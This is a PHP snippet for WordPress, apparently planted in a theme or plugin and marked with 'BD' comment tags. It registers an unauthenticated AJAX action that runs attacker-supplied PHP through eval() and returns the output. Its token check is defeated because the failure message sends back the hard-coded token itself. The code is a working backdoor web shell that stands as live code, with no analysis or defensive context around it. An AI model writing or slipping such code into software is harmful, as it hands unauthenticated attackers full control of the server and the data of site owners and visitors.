// ==[BD:RkUmDoYr]== add_action( 'wp_ajax_nopriv_vgivihilwjc', function() { $flag = 'RkUmDoYr2uZzILb4KsfJvWxWITDOQv9S'; $token = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $token ) || ! hash_equals( $flag, $token ) ) { wp_send_json_error( [ 'message' => 'tok:' . $flag ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $desc = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $obj = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $obj, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $desc ) * 1000, 2 ) ] ); } catch ( \Throwable $sym ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $sym->getMessage(), 'time_ms' => round( ( microtime( true ) - $desc ) * 1000, 2 ) ] ); } } ); // ==[/BD:RkUmDoYr]==